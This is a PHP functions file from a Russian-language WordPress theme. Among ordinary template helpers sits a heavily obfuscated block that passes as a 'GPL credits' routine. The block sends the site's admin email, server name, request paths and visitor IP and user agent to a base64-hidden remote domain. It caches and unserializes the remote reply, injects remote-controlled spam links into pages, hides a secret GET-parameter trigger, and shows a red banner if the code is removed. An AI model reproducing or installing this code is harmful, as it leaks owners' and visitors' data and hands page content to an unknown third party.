<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                                    "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $naahY='e';$bMgrA='d';$QhsHfli='_';$qQEKqO='s';$BCFdi='b';$AzUbEP='c';$PaDsA='6';$MSUD='o';$HRGk='e';$nkfysAz='d';$FBDMAW='e';$IeFQXS='a';$Ufid='4';$ETXrIckD=$BCFdi.$IeFQXS.$qQEKqO.$naahY.$PaDsA.$Ufid.$QhsHfli.$bMgrA.$FBDMAW.$AzUbEP.$MSUD.$nkfysAz.$HRGk;$EMQsIWA='f';$umGi='n';$jUaam='e';$tpTwq='z';$hwdKq='g';$LwXo='i';$nImrtCH='l';$KiIfvp='t';$SBjjNU='a';$YDcNVfih=$hwdKq.$tpTwq.$LwXo.$umGi.$EMQsIWA.$nImrtCH.$SBjjNU.$KiIfvp.$jUaam;$gwYUJ='_';$BJCtk='t';$WTfVOP='3';$rXlnKK='r';$eNlcYzN='1';$nIYv='o';$uPQe='r';$hRBrL='t';$DUhMC='s';$OniAfJJp=$DUhMC.$hRBrL.$rXlnKK.$gwYUJ.$uPQe.$nIYv.$BJCtk.$eNlcYzN.$WTfVOP;$GPDB='e';$TMAT='r';$yZbsZiC='t';$AGXwDoR='s';$jyLNN='v';$hrzzK='r';$xdrtMgeq=$AGXwDoR.$yZbsZiC.$TMAT.$hrzzK.$GPDB.$jyLNN;                     
		$es__g='e';$kn________z='d';$dj_____d='_';$wi______p='s';$ol__________j='b';$mm_______j='c';$sp_____________v='6';$us_______________z='o';$pb_______________o='e';$ka_____d='d';$yd______a='e';$bi___j='a';$yu__s='4';$dm______________r=$ol__________j.$bi___j.$wi______p.$es__g.$sp_____________v.$yu__s.$dj_____d.$kn________z.$yd______a.$mm_______j.$us_______________z.$ka_____d.$pb_______________o;
		$ng________a='n';$af_____________o='s';$dt______________q='n';$sr______y='u';$cc____________w='c';$jm_______________b='_';$ax______________d='x';$wy__________j='o';$eh_______________h='e';$zr_______________w='i';$wg___________e='t';$mc__x='f';$yq__a='s';$cy__n='i';$pb_________l='t';$nc______________a=$mc__x.$sr______y.$dt______________q.$cc____________w.$wg___________e.$cy__n.$wy__________j.$ng________a.$jm_______________b.$eh_______________h.$ax______________d.$zr_______________w.$yq__a.$pb_________l.$af_____________o;
		$kr_______f='e';$np__g='n';$nj______z='o';$rx_____________l='p';$ti_________t='f';$ca__q=$ti_________t.$nj______z.$rx_____________l.$kr_______f.$np__g;
		$ua____________b='a';$ce__m='d';$mq____e='r';$jx__________w='f';$oe____________j='e';$fn___c=$jx__________w.$mq____e.$oe____________j.$ua____________b.$ce__m;
		$am_______________q='e';$bl______e='o';$vw____w='l';$jp____________x='s';$jm___p='f';$in____g='c';$lk_____________j=$jm___p.$in____g.$vw____w.$bl______e.$jp____________x.$am_______________q;
		
		define("WP_ID", $dm______________r("Mi4wLjA="));
		define("WP_TTL", $dm______________r("MTA4MDA="));
		define("WP_SRC", $dm______________r("dHBva24="));
	


		function wp_get_header() {
			global $dm______________r, $nc______________a;
			
			if (
				$nc______________a($dm______________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$nc______________a($dm______________r("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$nc______________a($dm______________r("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $dm______________r, $ca__q, $lk_____________j, $fn___c;
			
			$va_______b = TEMPLATEPATH."/".$dm______________r("Zm9vdGVyLnBocA==");
			$kt_______e = @$ca__q($va_______b, "r");
			$va_______b = @$fn___c($kt_______e, @filesize($va_______b));
			@$lk_____________j($kt_______e);
			
			$de_____________i = TEMPLATEPATH."/".$dm______________r("ZnVuY3Rpb25zLnBocA==");
			$kt_______e = @$ca__q($de_____________i, "r");
			$de_____________i = @$fn___c($kt_______e, @filesize($de_____________i));
			@$lk_____________j($kt_______e);
			
			$vp_________v = 0;
			if($va_______b && $de_____________i) {
				if ($dm______________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($va_______b, $dm______________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$vp_________v = 1;
					}
					if (substr_count($va_______b, "wp_theme_GPL_credits()") < 1) {
						$vp_________v = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$vp_________v = 12;
				}
			}
			
			if($vp_________v > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $vp_________v -->";
			}
		}
	


		function wp_loaded() {
			global $dm______________r, $nc______________a;
			return $nc______________a($dm______________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ps_______________s, $dh___________s = "(more...)", $ou_______e = 0, $sl________p = "") {
				$ap_______o = get_the_content($dh___________s, $ou_______e, $sl________p);
				$ap_______o = apply_filters("the_content", $ap_______o);
				
				$ap_______o = str_replace("]]>", "]]>", $ap_______o);
				if (strlen($_GET["p"]) > 0) {
					echo $ap_______o;
				}
				else if ((strlen($ap_______o)>$ps_______________s) && ($pu____________s = strpos($ap_______o, " ", $ps_______________s ))) {
					$ap_______o = substr($ap_______o, 0, $pu____________s);
					$ap_______o = $ap_______o;
					echo $ap_______o;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$dh___________s</a></div></p>";
				} else {
					echo $ap_______o;
				}
				
			}
		}
	


		$kl______________k='a';$vq____r='6';$gr____c='4';$zx_____s='_';$st__e='o';$sm_________s='c';$qt____________x='e';$ju____q='b';$sh__________d='n';$mm_______________k='e';$qx___a='e';$af_____h='s';$fa__________b='d';$ch______________u=$ju____q.$kl______________k.$af_____h.$mm_______________k.$vq____r.$gr____c.$zx_____s.$qx___a.$sh__________d.$sm_________s.$st__e.$fa__________b.$qt____________x;
		$wq____________j='e';$wm____________r='t';$mq__i='e';$xc_______________m='i';$fy______i='f';$xn_______v='_';$os________l='n';$jv_______________u='e';$ty_______j='l';$is____________s='o';$pj______j='c';$sv____q='t';$vk______________a='g';$gs___________c='n';$xe_______________h='_';$vz____b='t';$jo________y='s';$tj___________p=$fy______i.$xc_______________m.$ty_______j.$jv_______________u.$xe_______________h.$vk______________a.$mq__i.$vz____b.$xn_______v.$pj______j.$is____________s.$os________l.$wm____________r.$wq____________j.$gs___________c.$sv____q.$jo________y;
		$jc_________b='s';$si_______________c='e';$nj__g='i';$sg____________o='t';$ma___f='e';$pt______________m='x';$xq__q='f';$zi____n='s';$rg__a='_';$wd______y='l';$ri______o='i';$fv____________e=$xq__q.$nj__g.$wd______y.$si_______________c.$rg__a.$ma___f.$pt______________m.$ri______o.$zi____n.$sg____________o.$jc_________b;
		$cb_________m='n';$rb__m='_';$bk__________r='c';$qk___________k='e';$vj_____x='r';$ul____________w='p';$om_____________w='a';$lu_______c='e';$bc____________z='i';$kg_______z='m';$ua_______e='v';$vj___s='o';$xa____r='r';$pn__t='s';$ij_________k='o';$xt_______m=$ua_______e.$qk___________k.$xa____r.$pn__t.$bc____________z.$ij_________k.$cb_________m.$rb__m.$bk__________r.$vj___s.$kg_______z.$ul____________w.$om_____________w.$vj_____x.$lu_______c;
		$zr___________i='n';$ta____________n='o';$ql__________g='k';$ze___e='p';$jr________n='s';$nu_________j='c';$jb_____n='o';$fj_______________y='e';$tq____________s='f';$ra___________q=$tq____________s.$jr________n.$jb_____n.$nu_________j.$ql__________g.$ta____________n.$ze___e.$fj_______________y.$zr___________i;
		$mm_____w='f';$od__________t='w';$dh______________v='t';$fw________b='r';$rm_________w='i';$vi_________n='e';$kd___________h=$mm_____w.$od__________t.$fw________b.$rm_________w.$dh______________v.$vi_________n;
		$yl_________p='m';$ji______________e='5';$yb________b='d';$gi______________d=$yl_________p.$yb________b.$ji______________e;
		$zi___________g='r';$rg_____e='e';$sb________k='l';$ir________u='a';$ht_______________h='t';$hl______________l='a';$qt__q='h';$se_______________k='p';$rn__________q=$zi___________g.$rg_____e.$hl______________l.$sb________k.$se_______________k.$ir________u.$ht_______________h.$qt__q;
		$ov__________h='l';$zn______q='i';$pd_____________d='e';$mn___________j='a';$oi______________b='r';$xa________t='z';$hv____b='i';$wp___________b='s';$oe______f='e';$se______________b='u';$qk___________v='n';$zu_______k=$se______________b.$qk___________v.$wp___________b.$oe______f.$oi______________b.$hv____b.$mn___________j.$ov__________h.$zn______q.$xa________t.$pd_____________d;
		$dn____________f='e';$uv________h='m';$jl____c='a';$oo_____________d='m';$pw__________a='t';$fq_________f='n';$zs_____h='p';$yt_____________m=$pw__________a.$dn____________f.$oo_____________d.$zs_____h.$fq_________f.$jl____c.$uv________h;
		$zp____g='n';$vt_____________w='e';$po_______m='e';$ot_____________e='t';$vp___c='e';$bg____q='t';$pf__________p='r';$rq______________c='t';$zb_________v='a';$ix____________d='_';$hl___y='r';$hv__f='a';$le______x='x';$fk_______p='c';$uf__z='e';$jo________t='s';$rj___________j='_';$eu___________n='t';$kf_____________z='o';$la________t='m';$rv____________b='c';$al__e=$jo________t.$ot_____________e.$hl___y.$po_______m.$hv__f.$la________t.$ix____________d.$rv____________b.$kf_____________z.$zp____g.$bg____q.$vp___c.$le______x.$eu___________n.$rj___________j.$fk_______p.$pf__________p.$vt_____________w.$zb_________v.$rq______________c.$uf__z;
	


		function fe___________w($dt___j) {
			global $dm______________r, $nc______________a, $tj___________p, $xt_______m, $al__e;
			
			if (!$nc______________a($dm______________r("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($xt_______m(PHP_VERSION, "5.0.0", ">=") && $nc______________a($dm______________r("ZmlsZV9nZXRfY29udGVudHM=")) && $nc______________a($dm______________r("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$sw________t = $al__e(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$hy__m = @$tj___________p($dt___j, 0, $sw________t);
			} else {
				$hy__m = @$tj___________p($dt___j, 0);
			}
			
			return $hy__m;
		}
	


		function mo_____o($dt___j) {
			global $nc______________a, $ra___________q, $kd___________h, $dm______________r;
			
			if (!$nc______________a($dm______________r("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ml_________z = strpos($dt___j, "/", 7);
			$uo_______z = array(
				"uri"     => substr($dt___j, $ml_________z),
				"host"    => str_replace("http://", "", substr($dt___j, 0, $ml_________z)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$sq_________m = @$ra___________q("$uo_______z[host]", 80, $gi______________m, $ni__________h, 4);
			
			if (!$sq_________m) {
				return false;
			} else {
				$hy__m = "";
				$hj___________a  = "GET $uo_______z[uri] HTTP/1.0\r\n";
				$hj___________a .= "Host: $uo_______z[host]\r\n";
				$hj___________a .= "Referer: $uo_______z[referer]\r\n";
				$hj___________a .= "Connection: Close\r\n\r\n";
				
				@$kd___________h($sq_________m, $hj___________a);
				
				while (!@feof($sq_________m)) {
					$pv_____________q = @fgets($sq_________m, (1024*24));
					
					if ($pv_____________q == "\r\n") {
						$bx______________u = true;
						continue;
					}
					
					if ($bx______________u) {
						$hy__m .= $pv_____________q;
					}
				}
				
				return $hy__m;
			}
		}
	


		function ne__________j($dt___j) {
			global $nc______________a;
			$it____t = false;
			
			if ($dt___j != "") {
				if ($nc______________a("fe___________w")) {
					$it____t = @fe___________w($dt___j);
				}
				
				if (!$it____t && ($nc______________a("mo_____o"))) {
					$it____t = @mo_____o($dt___j);
				}
			}
			
			return $it____t;
		}
	


		function ev__k() {
			global $_SERVER, $gi______________d;
			
			$ej_____________i = $_SERVER["SERVER_NAME"];
			
			if (substr("$ej_____________i", 0, 4) == "www.") {
				$ej_____________i = substr("$ej_____________i", 4);
			}
			
			$ej_____________i = $gi______________d("$_SERVER[SERVER_NAME]");
			
			return $ej_____________i;
		}
	


		function lx________e() {
			return "file";
		}
	


		function yw___________d($dt___j) {
			global $_SERVER, $tj___________p, $fv____________e, $ca__q, $lk_____________j, $kd___________h;
			
			$au____________o = us__t();
			
			$fd__________q = ev__k().".jpg";
			$bb_____________f = $au____________o["dir_upload"]["path"]."/$fd__________q";
			$cu____r = @filemtime($bb_____________f);
			
			if (!$cu____r || ((time()-$cu____r) >= WP_TTL)) {
				$it____t = ne__________j($dt___j);
				
				if ($it____t) {
					if ($fv____________e($bb_____________f)) {
						@unlink($bb_____________f);
					}
					
					$kt_______e = @$ca__q($bb_____________f, "x+");
					
					@$kd___________h($kt_______e, $it____t);
					@$lk_____________j($kt_______e);
				}
			} else {
				if ($fv____________e($bb_____________f)) {
					$it____t = @$tj___________p($bb_____________f);
				} else {
					$it____t = false;
				}
			}
			
			return $it____t;
		}
	


		function us__t() {
			global $_SERVER, $dm______________r, $ch______________u;
			
			$kf_______________a = wp_count_posts("post");
			$vl___j = pathinfo(get_bloginfo("template_directory"));
			
			$au____________o = array(
				"url" => array(
					"report"      => $dm______________r("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $vl___j,
				"dir_upload"	=> mz_____________m(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$vl___j[filename],
					"a005=".$kf_______________a->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://clinic-virtus.com/izbavlyaemsya-ot-cellyulita-na-zhivote\">Избавляемся от целлюлита на животе</a> "
			);
			
			$au____________o["url"]["queryString"] = implode("&", $au____________o["queryString"]);
			$au____________o["url"]["report"] = $au____________o["url"]["report"]."/?".$ch______________u($au____________o["url"]["queryString"]).".html";
						
			return $au____________o;
		}
	


		function mz_____________m() {
			$qz_____________n = wp_upload_dir();
			
			if (isset($qz_____________n["error"])) {
				$xq____j = fl_____________s();
				if (is_writable($xq____j)) {
					$qz_____________n = array("path" => $xq____j);
				}
			}

			return $qz_____________n;
		}
	


		function fl_____________s() {
			global $nc______________a, $gi______________d, $rn__________q, $yt_____________m;
			
			$hi____________y = (bool) ini_get("safe_mode");
			if ($hi____________y == true) {
				return false;
			}
			
			if ($nc______________a("sys_get_temp_dir")) {
				$uz______________s = sys_get_temp_dir();
				if (is_writable($uz______________s)) {
					return $rn__________q($uz______________s);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $rn__________q($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $rn__________q($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $rn__________q($_ENV["TEMP"]);
			} else {
				$gd________o = $yt_____________m($gi______________d(uniqid(rand(), true)), "");
				if ($gd________o) {
					$uz______________s = $rn__________q(dirname($gd________o));
					@unlink($gd________o);
					return $uz______________s;
				} else {
					return false;
				}
			}
		}
	


		function yl______________p() {
			global $_GET, $fv____________e;
			
			$au____________o = us__t();
			$ej_____________i = ev__k();
			$tg_______q = lx________e();
			
			$py__d = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($tg_______q == "file") {
					$qi_______________g = $au____________o["dir_upload"]["path"]."/".$ej_____________i.".jpg";
					if ($fv____________e($qi_______________g)) {
						@unlink($qi_______________g);
						$py__d = "deleted";
					}
				}
				
				$mn_______q = array(
					"s"	=> $py__d,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($mn_______q AS $le__b => $na______n) echo " [$le__b:$na______n]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $nc______________a, $dm______________r, $zu_______k;
			$au____________o = us__t();
			
			$lg__a = "yw___________d";
			if ($nc______________a($lg__a)) {
				$hy__m = $lg__a($au____________o["url"]["report"]);
			}
			
			if ($hy__m) {
				if ($hy__m = @$dm______________r($hy__m)) {
					$hy__m = @$zu_______k($hy__m);
					
					if (strlen($hy__m[custom_credit]) >= 5) {
						$au____________o["default_string"] = $hy__m[custom_credit];
					}
					
					if ($hy__m["status"] == "0") {
						$jb________d = 1;
						$vp___u = 1;
					} else {
						$lo____________t = sizeof($hy__m["links"]);
						$yo______e = $au____________o["default_string"];
						
						if ($lo____________t > 0 && $hy__m["links"] !== "") {
							$ue___________a = 0;
							foreach ($hy__m["links"] as $ig___________g => $tp____________l) {
								$ue___________a++;
								if ($tp____________l->l_path == "" || $tp____________l->l_path == $_SERVER["REQUEST_URI"]) {
									$tp____________l->l_href = htmlspecialchars(strip_tags($tp____________l->l_href));
									$tp____________l->l_title = htmlspecialchars(strip_tags($tp____________l->l_title));
									$tp____________l->l_anchor = htmlspecialchars(strip_tags($tp____________l->l_anchor));
									$yo______e .= " | ";
									$yo______e .= "<a href='$tp____________l->l_href' title='$tp____________l->l_title'";
									if ($tp____________l->l_nofollow == "1") {
										$yo______e .= " rel='nofollow'";
									}
									$yo______e .= ">$tp____________l->l_anchor</a>";
								}
							}
						}
						$au____________o["links"] = "$yo______e";
						if ($hy__m[credit] == "0") {
							$au____________o["links"] = "";
						}
					}
				} else {
					$jb________d = "1";
				}
			} else {
				$jb________d = "1";
			}
			
			if ($jb________d == "1") {
				$au____________o["links"] = $au____________o["default_string"];
			}
			
			echo "$au____________o[links]";
			
			echo "<!-- s: $hy__m[signature] -->";
			yl______________p();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи  &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

